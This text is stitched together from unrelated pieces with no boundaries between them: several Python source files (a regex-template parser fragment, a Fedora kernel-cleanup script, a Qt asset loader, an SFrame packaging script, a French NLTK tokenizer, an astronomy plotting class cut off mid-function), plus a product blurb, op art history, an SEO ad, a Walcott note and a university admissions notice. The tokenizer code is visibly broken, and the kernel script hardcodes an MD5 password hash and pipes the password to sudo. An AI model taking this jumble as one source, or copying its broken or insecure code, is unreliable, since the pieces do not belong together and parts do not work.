(flags & SRE_FLAG_VERBOSE) and p.pattern.flags & SRE_FLAG_VERBOSE: # the VERBOSE flag was switched on inside the pattern. to be # on the safe side, we'll parse the whole thing again... return parse(str, p.pattern.flags) return p def parse_template(source, pattern): # parse 're' replacement string into list of literals and # group references s = Tokenizer(source) p = [] a = p.append def literal(literal, p=p): if p and p[-1][0] is LITERAL: p[-1] = LITERAL, p[-1][1] + literal else: p.append((LITERAL, literal)) sep = source[:0] if type(sep) is type(""): makechar = chr else: makechar = unichr while 1: this = s.get() if this is None: break # end of replacement string if this and this[0] == "\\": # group if this == "\\g": name = "" if s.match("<"): while 1: char = s.get() if char is None: raise error, "unterminated group name" if char == ">": break name = name + char if not name: raise error, "bad group name" try: index = atoi(name) except ValueError: if not isname(name): raise error, "bad character in group name" try: index = pattern.groupindex[name] except KeyError: raise IndexError, "unknown group name" a((MARK, index)) elif len(this) > 1 and this[1] in DIGITS: code = None while 1: group = _group(this, pattern.groups+1) if group: if (s.next not in DIGITS or not _group(this + s.next, pattern.groups+1)): code = MARK, group break elif s.next in OCTDIGITS: this = this + s.get() else: break if not code: this = this[1:] code = LITERAL, makechar(atoi(this[-6:], 8) & 0xff) if code[0] is LITERAL: literal(code[1]) else: a(code) else: try: this = makechar(ESCAPES[this][1]) except KeyError: pass literal(this) else: literal(this) # convert template to groups and literals lists i = 0 groups = [] literals = [] for c, s in p: if c is MARK: groups.append((i, s)) literals.append(None) else: literals.append(s) i = i + 1 return groups, literals def expand_template(template, match): g = match.group sep = match.string[:0] groups, literals = template literals = literals[:] try: for index, group in groups: literals[index] = s = g(group) if s is None: raise IndexError except IndexError: raise error, "empty group" return string.join(literals, sep)
Two inserts per pack. Inserts contain a unique blend of essential oils. Eco-friendly and long lasting .Inexpensive alternative to toxic chemical sprays and wipes. Customized for Fly Armor Gear. Lasts approximately four weeks. CAUTION: DO NOT ALLOW CHILDREN TO PLAY WITH THIS BAND. IT IS NOT TO BE PLACED IN THE MOUTH OR TAKEN INTERNALLY BY MAN OR ANIMAL. ANIMALS SHOULD NOT BE PERMITTED TO CHEW ON BAND.
#!/usr/bin/env python3 # -*- coding: utf-8 -*- r""" # .---. .----------- # / \ __ / ------ # / / \( )/ ----- (`-') _ _(`-') <-. (`-')_ # ////// '\/ ` --- ( OO).-/( (OO ).-> .-> \( OO) ) .-> # //// / // : : --- (,------. \ .'_ (`-')----. ,--./ ,--/ ,--.' ,-. # // / / / `\/ '-- | .---' '`'-..__)( OO).-. ' | \ | | (`-')'.' / # // //..\\ (| '--. | | ' |( _) | | | | . '| |)(OO \ / # ============UU====UU==== | .--' | | / : \| |)| | | |\ | | / /) # '//||\\` | `---. | '-' / ' '-' ' | | \ | `-/ /` # ''`` `------' `------' `-----' `--' `--' `--' # ###################################################################################### # # Author: edony - edonyzpc@gmail.com # # twitter : @edonyzpc # # Last modified: 2015-06-02 20:50 # # Filename: kernelclean.py # # Description: All Rights Are Reserved # """ #import scipy as sp #import math as m #import matplotlib as mpl #import matplotlib.pyplot as plt #from mpl_toolkits.mplot3d import Axes3D as Ax3 #from scipy import stats as st #from matplotlib import cm #import numpy as np from __future__ import absolute_import import os import re import sys import subprocess as sp import platform as pf from getpass import getpass import hashlib if sys.version.startswith("3.4."): from functools import reduce from packages.fileparser.extractor import Extractor class PyColor(object): """ This class is for colored print in the python interpreter! "F3" call Addpy() function to add this class which is defined in the .vimrc for vim Editor.""" def __init__(self): self.self_doc = r""" STYLE: \033['display model';'foreground';'background'm DETAILS: FOREGROUND BACKGOUND COLOR --------------------------------------- 30 40 black 31 41 red 32 42 green 33 43 yellow 34 44 blue 35 45 purple 36 46 cyan 37 47 white DISPLAY MODEL DETAILS ------------------------- 0 default 1 highlight 4 underline 5 flicker 7 reverse 8 non-visiable e.g: \033[1;31;40m <!--1-highlight;31-foreground red;40-background black--> \033[0m <!--set all into default--> """ self.warningcolor = '\033[0;31m' self.tipcolor = '\033[0;32m' self.endcolor = '\033[0m' self._newcolor = '' @property def new(self): """ Customized Python Print Color. """ return self._newcolor @new.setter def new(self, color_str): """ New Color. """ self._newcolor = color_str def disable(self): """ Disable Color Print. """ self.warningcolor = '' self.endcolor = '' class KernelClean(object): """ Cleanup the Fedora Linux kernel after `dnf(yum) update`. """ def __init__(self, check=0): self._filebuf = 'kernelclean' self.kernel = '' self.exist_kernels = [] self.old_kernel = [] self.kernel_clean = [] self.color = PyColor() # self.check for manual check to remove system kernel(1 for check, 0 for not check) self.check = check self.record = [] def in_using_kernel(self): """ RPM query about the kernel existing in the system => self._filebuf Get the version of running kernel => self.kernel ***rewrite the using kernel finding*** command_rpm_kernel = 'rpm -qa | grep "^kernel-" > ' command_rpm_kernel += self._filebuf os.system(command_rpm_kernel) command_kernel = 'uname -r' pipeout = sp.Popen(command_kernel.split(), stdout=sp.PIPE) self.kernel = pipeout.stdout.readline().rstrip().decode('utf-8') """ pipeout = sp.Popen('uname -r'.split(), stdout=sp.PIPE) self.kernel = pipeout.stdout.readline().rstrip().decode('utf-8') out = sp.Popen('rpm -qa'.split(), stdout=sp.PIPE) for ls in out.stdout.readlines(): pattern = '^kernel-' ls = ls.rstrip().decode('utf-8') if re.match(pattern, ls): self.exist_kernels.append(ls) def find_old_kernel(self): """ Find the old kernel in system => self.old_kernel """ pattern = "^kernel-[a-zA-Z-]*([0-9.-]*)([a-zA-Z]+)(.*)" self.record = set([re.match(pattern, item).groups() for item in self.exist_kernels]) self.old_kernel = [item for item in self.record if item[0] not in self.kernel] def to_cleaned_kernel(self): """ Ensure the to be cleaned kernel in queried list => self.kernelclean """ if self.old_kernel: kernel_clean_id = [] [kernel_clean_id.append(''.join(item)) for item in list(self.old_kernel)] for id in kernel_clean_id: [self.kernel_clean.append(item) for item in self.exist_kernels if id in item] def cleanup(self): """ Cleanup the old kernel """ if self.old_kernel: reboot = input(self.color.endcolor + 'Do You Need to Reboot System?(y or n)\n') if reboot == 'y': os.system('reboot') elif reboot == 'n': print(self.color.warningcolor + 'Cleanup Kernel ...' + self.color.endcolor) pwd_md5 = 'b04c541ed735353c44c52984a1be27f8' pwd = getpass("Enter Your Password: ") if hashlib.md5(pwd.encode('utf-8')).hexdigest() != pwd_md5: print(self.color.warningcolor + "Wrong Password" + self.color.endcolor) print('\033[0;36m' + "Try Angain" + '\033[0m') pwd = getpass("Enter Your Password: ") if hashlib.md5(pwd.encode('utf-8')).hexdigest() != pwd_md5: return echo = ['echo'] echo.append(pwd) if pf.linux_distribution()[1] > '21': command = 'sudo -S dnf -y remove ' for item in self.kernel_clean: command += item command += ' ' else: command = 'sudo -S yum -y remove ' for item in self.kernel_clean: command += item command += ' ' pipein = sp.Popen(echo, stdout=sp.PIPE) pipeout = sp.Popen(command.split(), stdin=pipein.stdout, stdout=sp.PIPE) for line in pipeout.stdout.readlines(): if line == '': break if isinstance(line, bytes): line = line.decode() print(line) print(self.color.tipcolor + 'End Cleanup!' + self.color.endcolor) print(self.color.warningcolor +\ 'Your Kernel is Update!' +\ self.color.endcolor) def main(self): """ Union the cleanup stream """ self.in_using_kernel() self.find_old_kernel() self.to_cleaned_kernel() if self.check == 1: if self.old_kernel: print(self.color.tipcolor + 'Your Old Kernel: ') for item in self.old_kernel: print(''.join(item)) print(self.color.warningcolor + 'In Using Kernel: ') print(self.kernel + self.color.endcolor) check_cmd = input('Remove the old kernel?(y or n)\n') if check_cmd == 'y': self.cleanup() else: print('\033[36m' + 'Do Not Remove Old kernel' + '\033[0m') else: print(self.color.tipcolor +\ 'Your System Has No Old Kernel To Cleanup!' +\ self.color.endcolor) if __name__ == '__main__': TEST = KernelClean(1) TEST.in_using_kernel() TEST.find_old_kernel() TEST.to_cleaned_kernel()
Shigeo Fukuda was a sculptor, graphic artist and poster designer who created optical illusions. His art pieces usually portray deception, such as Lunch With a Helmet On, a sculpture created entirely from forks, knives, and spoons, that casts a detailed shadow of a motorcycle. Fukuda was born on February 4, 1932 in Tokyo to a family that was involved in manufacturing toys. After the end of World War II, he became interested in the minimalist Swiss Style of graphic design, and graduated from Tokyo National University of Fine Arts and Music in 1956. In 1987, Fukuda was inducted into the Art Directors Club Hall of Fame in New York City, which described him as "Japan's consummate visual communicator", making him the first Japanese designer chosen for this recognition. The Art Directors Club noted the "bitingly satirical commentary on the senselessness of war" shown in "Victory 1945", which won him the grand prize at the 1975 Warsaw Poster Contest, a competition whose proceeds went to the Peace Fund Movement. His home outside Tokyo featured a 4-foot-high (1.2 m) front door that would appear far away from someone approaching the house. This door was a visual trick, with the actual entrance to the house being an unornamented white door designed to blend in seamlessly with the walls of the house. James Vinciguerra op re-interpretation of first BBB tee. In 1965, an exhibition called The Responsive Eye, created by William C. Seitz was held at the Museum of Modern Art in New York City. The works shown were wide ranging, encompassing the minimalism of Frank Stella and Ellsworth Kelly, the smooth plasticity of Alexander Liberman, the collaborative efforts of the Anonima group, alongside the well-known Victor Vasarely, Richard Anuszkiewicz, and Bridget Riley. The exhibition focused on the perceptual aspects of art, which result both from the illusion of movement and the interaction of color relationships. The exhibition was enormously popular with the general public, though less so with the critics. Critics dismissed op art as portraying nothing more than trompe l'oeil, or tricks that fool the eye. Regardless, op art's popularity with the public increased, and op art images were used in a number of commercial contexts. Bridget Riley tried to sue an American company, without success, for using one of her paintings as the basis of a fabric design. The American artist collaborative, Anonima Group, was founded in Cleveland, Ohio in 1960 by Ernst Benkert, Francis Hewitt and Ed Mieczkowski. Propelled by their rejection of the cult of the ego and automatic style of the Abstract Expressionists, the artists worked collaboratively on grid-based, spatially fluctuating drawings and paintings that were precise investigations of the scientific phenomena and psychology of optical perception. The work was accompanied by writings: proposals, projects and manifestos - socialist in nature - which the artists considered essential to the experience and understanding of their work. Their drawings, paintings and writings, which had much in common with the positions of artist Ad Reinhardt, and with the Russian Constructivists, were included in the 1965 Responsive Eye exhibit at the Museum of Modern Art. Along with other artists in the exhibit, Anonima's work was incorrectly relegated to what came to be the highly commercialized and publicized category of Op Art. A recent reconsideration and recontextualization of Op Art, the expansive 2006 Optic Nerve exhibit at the Columbus Museum of Art, places the Anonima as the sole American collaborative group, along with the European Zero Group, Gruppo N, GRAV and others, who were examining new optical information at that time. Zero is an artist group founded in Düsseldorf by Heinz Mack and Otto Piene. Piene described it as “a zone of silence and of pure possibilities for a new beginning.” In 1961 Günther Uecker joined the Zero group. ZERO stands for the international movement, with artists from Germany, Holland, Belgium, France, Switzerland, and Italy. The Gruppo N was born in 1959 in Padua as a free association called Ennea. The following year, nine of the original nine members remain: Alberto Biasi, Ennio Chiggio, Toni Costa, Edoardo Landi, Manfredo Massironi, who will name the group N, the first truly anonymous group. Other groups were born earlier: in 1951 in Zagreb Exact 51; Equip 57 in 1957 in Spain and others followed in 1960, Group T in Milan and GRAV in Paris. The Group N had strong innovative ideas in all directions of behavior and design. "The term enne distinguishes a group of experimental designers united by the need to collectively research." Groupe de Recherche d’Art Visuel (GRAV) (Research Art Group) was a collaborative artists group in Paris that consisted of eleven opto-kinetic artists who picked up on Victor Vasarely's concept that the sole artist was outdated and which, according to its 1963 manifesto, appealed to the direct participation of the public with an influence on its behavior, notably through the use of interactive labyrinths. GRAV was active in Paris from 1960 to 1968. Their main aim was to merge the individual identities of the members into a collective and individually anonymous activity linked to the scientific and technological disciplines based around collective events called Labyrinths. Their ideals enticed them to investigate a wide spectrum of kinetic art and op art optical effects by using various types of artificial light and mechanical movement. In their first Labyrinth, held in 1963 at the Paris Biennale, they presented three years work based on optical and kinetic devices. Thereafter they discovered that their effort to engage the human eye had shifted their concerns towards those of spectator participation; a foreshadow of interactive art. Equipo 57 is the ultimate example of Radical Geometric Abstract Art in Spain and whose work, in both practice and theory, defends an art of social commitment. In 1957 the group makes public, through a manifesto, their artistic purposes: the denunciation of production and market mechanisms, the desire to renew the current artistic situation and the search for a social function to art and the integration of the artist in society. With this they are part of an activist attitude that is characteristic of these avant-garde groups and - in the words of Ángel Llorente - their work "shows the alternative that led the Equipo: the defence of a new artistic behaviour in society. An assumed social commitment, although there are some contradictions, regarding the artistic practice of geometric abstraction." To carry out these objectives, this group became interested in rationalistic and analytical tendencies which carried the strong stamp of scientific approaches. The beginnings of Equipo 57 are intertwined with painting and a consequent artistic theory. As noted by Llorente, from painting and its theoretical production its members move onto sculpture and architecture as a logical consequence of their research on the physical and architectural space (based on surfaces) and interactivity of the artistic space.
import os import sys import itertools from ...vendor.Qt import QtWidgets, QtCore from ... import api from .. import lib self = sys.modules[__name__] self._window = None # Store previous results from api.ls() self._cache = list() self._use_cache = False # Custom roles AssetRole = QtCore.Qt.UserRole + 1 SubsetRole = QtCore.Qt.UserRole + 2 class Window(QtWidgets.QDialog): """Basic asset loader interface _________________________________________ | | | Assets | | _____________________________________ | | | | | | | | Asset 1 | Subset 1 | | | | Asset 2 | Subset 2 | | | | ... | ... | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |__________________|__________________| | | _____________________________________ | | | | | | | Load | | | |_____________________________________| | |_________________________________________| """ def __init__(self, parent=None): super(Window, self).__init__(parent) self.setWindowTitle("Asset Loader") self.setFocusPolicy(QtCore.Qt.StrongFocus) body = QtWidgets.QWidget() footer = QtWidgets.QWidget() container = QtWidgets.QWidget() assets = QtWidgets.QListWidget() subsets = QtWidgets.QListWidget() # Enable loading many subsets at once subsets.setSelectionMode(subsets.ExtendedSelection) layout = QtWidgets.QHBoxLayout(container) layout.addWidget(assets) layout.addWidget(subsets) layout.setContentsMargins(0, 0, 0, 0) options = QtWidgets.QWidget() layout = QtWidgets.QGridLayout(options) layout.setContentsMargins(0, 0, 0, 0) autoclose_checkbox = QtWidgets.QCheckBox("Close after load") autoclose_checkbox.setCheckState(QtCore.Qt.Checked) layout.addWidget(autoclose_checkbox, 1, 0) layout = QtWidgets.QVBoxLayout(body) layout.addWidget(container) layout.addWidget(options, 0, QtCore.Qt.AlignLeft) layout.setContentsMargins(0, 0, 0, 0) load_button = QtWidgets.QPushButton("Load") refresh_button = QtWidgets.QPushButton("Refresh") stop_button = QtWidgets.QPushButton("Searching..") stop_button.setToolTip("Click to stop searching") message = QtWidgets.QLabel() message.hide() layout = QtWidgets.QVBoxLayout(footer) layout.addWidget(load_button) layout.addWidget(stop_button) layout.addWidget(refresh_button) layout.addWidget(message) layout.setContentsMargins(0, 0, 0, 0) layout = QtWidgets.QVBoxLayout(self) layout.addWidget(body) layout.addWidget(footer) self.data = { "state": { "running": False, }, "button": { "load": load_button, "stop": stop_button, "autoclose": autoclose_checkbox, }, "model": { "assets": assets, "subsets": subsets, }, "label": { "message": message, } } load_button.clicked.connect(self.on_load_pressed) stop_button.clicked.connect(self.on_stop_pressed) refresh_button.clicked.connect(self.on_refresh_pressed) assets.currentItemChanged.connect(self.on_assetschanged) subsets.currentItemChanged.connect(self.on_subsetschanged) # Defaults self.resize(320, 350) load_button.hide() stop_button.setFocus() def keyPressEvent(self, event): """Delegate keyboard events""" if event.key() == QtCore.Qt.Key_Return: return self.on_enter() def on_enter(self): self.on_load_pressed() def on_assetschanged(self, *args): assets_model = self.data["model"]["assets"] subsets_model = self.data["model"]["subsets"] subsets_model.clear() asset_item = assets_model.currentItem() # The model is empty if asset_item is None: return asset = asset_item.data(AssetRole) # The model contains an empty item if asset is None: return for subset in asset["subsets"]: item = QtWidgets.QListWidgetItem(subset["name"]) item.setData(QtCore.Qt.ItemIsEnabled, True) item.setData(SubsetRole, subset) subsets_model.addItem(item) def on_subsetschanged(self, *args): button = self.data["button"]["load"] item = self.data["model"]["assets"].currentItem() button.setEnabled(item.data(QtCore.Qt.ItemIsEnabled)) def refresh(self): """Load assets from disk and add them to a QListView This method runs part-asynchronous, in that it blocks when busy, but takes brief intermissions between each asset found so as to lighten the load off of disk, and to enable the artist to abort searching once the target asset has been found. """ assets_model = self.data["model"]["assets"] assets_model.clear() state = self.data["state"] has = {"assets": False} module = sys.modules[__name__] if module._use_cache: print("Using cache..") iterators = iter(module._cache) else: print("Reading from disk..") assets = api.ls(os.path.join(api.registered_root(), "assets")) film = api.ls(os.path.join(api.registered_root(), "film")) iterators = itertools.chain(assets, film) def on_next(): if not state["running"]: return on_finished() try: asset = next(iterators) # Cache for re-use if not module._use_cache: module._cache.append(asset) except StopIteration: return on_finished() has["assets"] = True item = QtWidgets.QListWidgetItem(asset["name"]) item.setData(QtCore.Qt.ItemIsEnabled, True) item.setData(AssetRole, asset) assets_model.addItem(item) lib.defer(25, on_next) def on_finished(): state["running"] = False module._use_cache = True if not has["assets"]: item = QtWidgets.QListWidgetItem("No assets found") item.setData(QtCore.Qt.ItemIsEnabled, False) assets_model.addItem(item) assets_model.setCurrentItem(assets_model.item(0)) assets_model.setFocus() self.data["button"]["load"].show() self.data["button"]["stop"].hide() state["running"] = True lib.defer(25, on_next) def on_refresh_pressed(self): # Clear cache sys.modules[__name__]._cache[:] = [] sys.modules[__name__]._use_cache = False self.refresh() def on_stop_pressed(self): button = self.data["button"]["stop"] button.setText("Stopping..") button.setEnabled(False) self.data["state"]["running"] = False def on_load_pressed(self): button = self.data["button"]["load"] if not button.isEnabled(): return assets_model = self.data["model"]["assets"] subsets_model = self.data["model"]["subsets"] autoclose_checkbox = self.data["button"]["autoclose"] asset_item = assets_model.currentItem() for subset_item in subsets_model.selectedItems(): if subset_item is None: return asset = asset_item.data(AssetRole) subset = subset_item.data(SubsetRole) assert asset assert subset try: api.registered_host().load(asset, subset) except ValueError as e: self.echo(e) raise except NameError as e: self.echo(e) raise # Catch-all except Exception as e: self.echo("Program error: %s" % str(e)) raise if autoclose_checkbox.checkState(): self.close() def echo(self, message): widget = self.data["label"]["message"] widget.setText(str(message)) widget.show() print(message) def closeEvent(self, event): print("Good bye") self.data["state"]["running"] = False return super(Window, self).closeEvent(event) def show(root=None, debug=False): """Display Loader GUI Arguments: debug (bool, optional): Run loader in debug-mode, defaults to False """ if self._window: self._window.close() del(self._window) try: widgets = QtWidgets.QApplication.topLevelWidgets() widgets = dict((w.objectName(), w) for w in widgets) parent = widgets["MayaWindow"] except KeyError: parent = None # Debug fixture fixture = api.fixture(assets=["Ryan", "Strange", "Blonde_model"]) with fixture if debug else lib.dummy(): with lib.application(): window = Window(parent) window.show() window.refresh() self._window = window
Jeff Pederson SEO offers ethical and affordable SEO services. Leading edge SEO services Portland Oregon, Local SEO and national SEO services. Services include link building, on-page optimization, PPC management, email campaign management and social media marketing.
#!/usr/bin/env python # $Id: sframe_parMaker.py 344 2012-12-13 13:10:53Z krasznaa $ #*************************************************************************** #* @Project: SFrame - ROOT-based analysis framework for ATLAS #* @Package: Core #* #* @author Stefan Ask <Stefan.Ask@cern.ch> - Manchester #* @author David Berge <David.Berge@cern.ch> - CERN #* @author Johannes Haller <Johannes.Haller@cern.ch> - Hamburg #* @author A. Krasznahorkay <Attila.Krasznahorkay@cern.ch> - NYU/Debrecen #* #*************************************************************************** # Script creating a PAR package from the contents of a directory. # (As long as the directory follows the SFrame layout...) # Import base module(s): import sys import os.path import optparse def main(): print " -- Proof ARchive creator for SFrame --" parser = optparse.OptionParser( usage="%prog [options]" ) parser.add_option( "-s", "--scrdir", dest="srcdir", action="store", type="string", default="./", help="Directory that is to be converted" ) parser.add_option( "-o", "--output", dest="output", action="store", type="string", default="Test.par", help="Output PAR file" ) parser.add_option( "-m", "--makefile", dest="makefile", action="store", type="string", default="Makefile", help="Name of the makefile in the package" ) parser.add_option( "-i", "--include", dest="include", action="store", type="string", default="include", help="Directory holding the header files" ) parser.add_option( "-c", "--src", dest="src", action="store", type="string", default="src", help="Directory holding the source files" ) parser.add_option( "-p", "--proofdir", dest="proofdir", action="store", type="string", default="proof", help="Directory holding the special files for PROOF" ) parser.add_option( "-v", "--verbose", dest="verbose", action="store_true", help="Print verbose information about package creation" ) ( options, garbage ) = parser.parse_args() if len( garbage ): print "The following options were not recognised:" print "" print " " + garbage parser.print_help(); return if options.verbose: print " >> srcdir = " + options.srcdir print " >> output = " + options.output print " >> makefile = " + options.makefile print " >> include = " + options.include print " >> src = " + options.src print " >> proofdir = " + options.proofdir import PARHelpers PARHelpers.PARMaker( options.srcdir, options.makefile, options.include, options.src, options.proofdir, options.output, options.verbose ) return # Call the main function: if __name__ == "__main__": main()
The poet and playwright Derek Walcott was born on this day in 1930 in Saint Lucia, an island country in the eastern Caribbean. He was awarded the Nobel Prize in Literature in 1992 “for a poetic oeuvre of great luminosity, sustained by a historical vision, the outcome of a multicultural commitment”. How does Walcott’s verse rate? The poetry critic William Logan summed it up with faint praise: “No living poet has written verse more delicately rendered or distinguished than Walcott, though few individual poems seem destined to be remembered.” This one is, we feel.
import nltk import re import sys import math import matplotlib.pyplot as plt from nltk import ne_chunk from nltk.util import ngrams from wordcloud import WordCloud, STOPWORDS from collections import defaultdict, Counter from pos_tagger import POSTagger sys.path.insert( 0, '/Users/diakite_w/Documents/Dev/ExperimentationsACA/FrenchLefffLemmatizer') from FrenchLefffLemmatizer import FrenchLefffLemmatizer import math import matplotlib.pyplot as plt def read_txt(textfile): with open(textfile, 'r') as f: text = f.read() text = text.replace('\n', ' ') text = text.replace('- ', '') text = text.replace('.', '') text = text.replace('-', '') text = text.replace("‘l'", 'ï') return text def display_wordcloud(tokens): ''' Display a simple wordcloup from processed tokens ''' # Join all tokens to make one big string join_text = ' '.join(tokens) wordcloud = WordCloud(background_color='white', width=1200, height=1000 ).generate(join_text) plt.imshow(wordcloud) plt.axis('off') plt.show() def link_splitted_words(texte): next_elt = texte[1:] def tokenize(text): fll = FrenchLefffLemmatizer() splck = SpellChecker() contracted_pronouns = ["l'", "m'", "n'", "d'", "c'", "j'", "qu'", "s'"] dictionnary = [] def link_splitted_words(texte): next_elt = texte[1:] def tokenizer(text): fll = FrenchLefffLemmatizer() #splck = SpellChecker() # Put everything to lower case text = text.lower() # Tokenize text tokens = nltk.tokenize.word_tokenize(text) print('Nombre de tokens dans le texte :', len(tokens)) # Remove contacted pronous from tokens contracted_pronouns = ["l'", "m'", "n'", "d'", "c'", "j'", "qu'", "s'"] tokens = [t[2:] if t[:2] in contracted_pronouns else t for t in tokens] # Spell check every tokens #tokens = [splck.correct(t) for t in tokens] # Remove all words with len <= 2 tokens = [t for t in tokens if len(t) > 2] #tokens = [splck.correct(t) if t not in dictionnary else t for t in tokens] tokens = [t for t in tokens if len(t) > 2] tokens = [t for t in tokens if t not in stopwords] tokens = [fll.lemmatize(t) for t in tokens] print('Nombre de tokens apres traitement :', len(tokens), '\n') return tokens def compute_tf(document, word): ''' Compute the TF of a document ''' with open(document, 'r') as f: text = f.read() text = text.replace('\n', ' ') text = text.replace('- ', '') text = text.replace('.', '') text = text.replace('-', '') text = text.replace("‘l'", 'ï') tokens = tokenize(text) def extract_ngrams(tokens, n): ''' Return list of n-grams ''' return Counter(ngrams(tokens, n)) # Load stop words with open('stopwords-fr.txt', 'r') as f: stopwords = [l[:-1] for l in f.readlines()] stopwords = list(set(stopwords)) #print(stopwords) # Load stop words stopwords = list(set(w.rstrip() for w in open('stopwords-fr.txt'))) # print(stopwords) # Read text file textfile = 'data/simple.txt' with open(textfile, 'r') as f: text = f.read() text = text.replace('\n', ' ') text = text.replace('- ', '') text = text.replace('.', '') text = text.replace('-', '') #print(text) tokens = tokenizer(text) vocabulary = list(set(tokens)) # Compute dictionnary of word (key) and index word_idx = {w: idx for w, idx in enumerate(vocabulary)} #print(word_idx) # DO YOU REALLY NEED THIS ? # Count nb of word appearance word_idf = defaultdict(lambda: 0) for token in tokens: word_idf[token] += 1 # Compute idf for word in vocabulary: word_idf[word] = math.log(1 / float(1)) # Compute tf word_tf = defaultdict(lambda: 0) for word in tokens: word_tf[word] += 1 for word in vocabulary: word_tf[word] /= len(tokens) join_text = ' '.join(tokens) wordcloud = WordCloud(background_color='white', width=1200, height=1000 ).generate(join_text) plt.imshow(wordcloud) plt.axis('off') plt.show() # Extracting n-grams bigrams = extract_ngrams(tokens, 2) trigrams = extract_ngrams(tokens, 3) [print(t) for t in trigrams.most_common(3)] [print(t) for t in bigrams.most_common(3)]
Applications are invited (in Form A) for admission to M.Phil. & Ph.D. Programmes in different subjects (as specified on University website www.uniraj.ernet.in or www.uniraj.ac.in ). As per new rules, admissions to these programmes will be made through an entrance test (Uniraj-MPAT) for each subject / discipline. Students willing to seek admission in affiliated colleges are required to take Uniraj-MPAT Test. Students who have qualified in UGC/CSIR NET/SLET (conducted by Rajasthan State only)/ GATE/ Teacher fellowship holder will be exempted from the Test. For M.Phil. programme, teachers permanently appointed prior to 1991-92 and for Ph.D. programme permanent teachers appointed on a substantive basis with three years of continuous service on regular pay scale are also exempted from Uniraj-MPAT. However, students/ teachers exempted from the Test are required to fill in Form B.
#!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.magic.plot.imagegrid Contains the ImageGridPlotter class. # ----------------------------------------------------------------- # Ensure Python 3 compatibility from __future__ import absolute_import, division, print_function # Import standard modules import math from scipy import ndimage import copy import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.axes_grid1 import AxesGrid import matplotlib.gridspec as gridspec import glob from matplotlib import colors from matplotlib import cm from matplotlib.colors import LogNorm import pyfits from collections import OrderedDict from textwrap import wrap from astropy.io import fits from pyfits import PrimaryHDU, Header from astropy.visualization import SqrtStretch, LogStretch from astropy.visualization.mpl_normalize import ImageNormalize import aplpy import wcsaxes import matplotlib.colors as mpl_colors import matplotlib.colorbar as mpl_colorbar # Import the relevant PTS classes and modules from ...core.tools.logging import log # ----------------------------------------------------------------- class ImageGridPlotter(object): """ This class ... """ def __init__(self, title=None): """ The constructor ... :param title: """ # Set the title self.title = title # Figure and grid self._figure = None self._grid = None # Properties self.style = "dark" # "dark" or "light" self.transparent = True self.format = None self.colormap = "viridis" self.vmin = None # ----------------------------------------------------------------- def set_title(self, title): """ This function ... :param title: :return: """ self.title = title # ----------------------------------------------------------------- class StandardImageGridPlotter(ImageGridPlotter): """ This class ... """ def __init__(self, title=None): """ The constructor ... :param title: """ # Call the constructor of the base class super(StandardImageGridPlotter, self).__init__(title) # -- Attributes -- # The images to be plotted self.images = OrderedDict() # Masks to be overlayed on the images self.masks = dict() # Regions to be overlayed on the images self.regions = dict() # Properties self.ncols = 7 self.width = 16 # ----------------------------------------------------------------- def run(self, output_path): """ This function ... :param output_path: :return: """ # Make the plot self.plot(output_path) # ----------------------------------------------------------------- def add_image(self, image, label, mask=None, region=None): """ This function ... :param image: :param label: :param mask: :param region: :return: """ self.images[label] = image if mask is not None: self.masks[label] = mask if region is not None: self.regions[label] = region # ----------------------------------------------------------------- @property def nimages(self): """ This function ... :return: """ return len(self.images) # ----------------------------------------------------------------- def plot(self, path): """ This function ... :param path: :return: """ # Determine the necessary number of rows nrows = int(math.ceil(self.nimages / self.ncols)) ratio = float(nrows) / float(self.ncols) height = ratio * self.width # Create the figure self._figure = plt.figure(figsize=(self.width, height)) self._figure.subplots_adjust(hspace=0.0, wspace=0.0) #self._figure.text(0.385, 0.97, "Offset from centre (degrees)", color='black', size='16', weight='bold') #self._figure.text(0.02, 0.615, "Offset from centre (degrees)", color='black', size='16', weight='bold', rotation='vertical') def standard_setup(sp): sp.set_frame_color('black') sp.set_tick_labels_font(size='10') sp.set_axis_labels_font(size='12') # sp.set_tick_labels_format(xformat='hh:mm',yformat='dd:mm') sp.set_xaxis_coord_type('scalar') sp.set_yaxis_coord_type('scalar') sp.set_tick_color('black') sp.recenter(x=0.0, y=0.0, width=3., height=0.6) sp.set_tick_xspacing(0.4) sp.set_tick_yspacing(0.25) sp.set_system_latex(True) sp.tick_labels.hide() sp.axis_labels.hide() # Create grid #self._grid = AxesGrid(self._figure, 111, # nrows_ncols=(nrows, self.ncols), # axes_pad=0.0, # label_mode="L", # #share_all=True, # share_all=False, # cbar_location="right", # cbar_mode="single", # cbar_size="0.5%", # cbar_pad="0.5%") # cbar_mode="single" gs = gridspec.GridSpec(nrows, self.ncols, wspace=0.0, hspace=0.0) # Loop over the images counter = 0 ax = None for label in self.images: row = int(counter / self.ncols) col = counter % self.ncols frame = self.images[label] #ax = self._grid[counter] subplotspec = gs[row, col] #points = subplotspec.get_position(self._figure).get_points() #print(points) #x_min = points[0, 0] #x_max = points[1, 0] #y_min = points[0, 1] #y_max = points[1, 1] # width = x_max - x_min # height = y_max - y_min # ax = self._figure.add_axes([x_min, y_min, width, height]) #ax = plt.subplot(subplotspec) #shareax = ax if ax is not None else None #ax = plt.subplot(subplotspec, projection=frame.wcs.to_astropy(), sharex=shareax, sharey=shareax) ax = plt.subplot(subplotspec, projection=frame.wcs.to_astropy()) #lon = ax.coords[0] #lat = ax.coords[1] #overlay = ax.get_coords_overlay('fk5') #overlay.grid(color='white', linestyle='solid', alpha=0.5) # Determine the maximum value in the box and the mimimum value for plotting norm = ImageNormalize(stretch=LogStretch()) #min_value = np.nanmin(frame) min_value = self.vmin if self.vmin is not None else np.nanmin(frame) max_value = 0.5 * (np.nanmax(frame) + min_value) #f1.show_colorscale(vmin=min_value, vmax=max_value, cmap="viridis") #f1.show_beam(major=0.01, minor=0.01, angle=0, fill=True, color='white') ## f1.axis_labels.show_y() #f1.tick_labels.set_xposition('top') #f1.tick_labels.show() ax.set_xticks([]) ax.set_yticks([]) ax.xaxis.set_ticklabels([]) ax.yaxis.set_ticklabels([]) #ax.spines['bottom'].set_color("white") #ax.spines['top'].set_color("white") #ax.spines['left'].set_color("white") #ax.spines['right'].set_color("white") ax.xaxis.label.set_color("white") ax.yaxis.label.set_color("white") ax.tick_params(axis='x', colors="white") ax.tick_params(axis='y', colors="white") # Get the color map cmap = cm.get_cmap(self.colormap) # Set background color background_color = cmap(0.0) ax.set_axis_bgcolor(background_color) # Plot 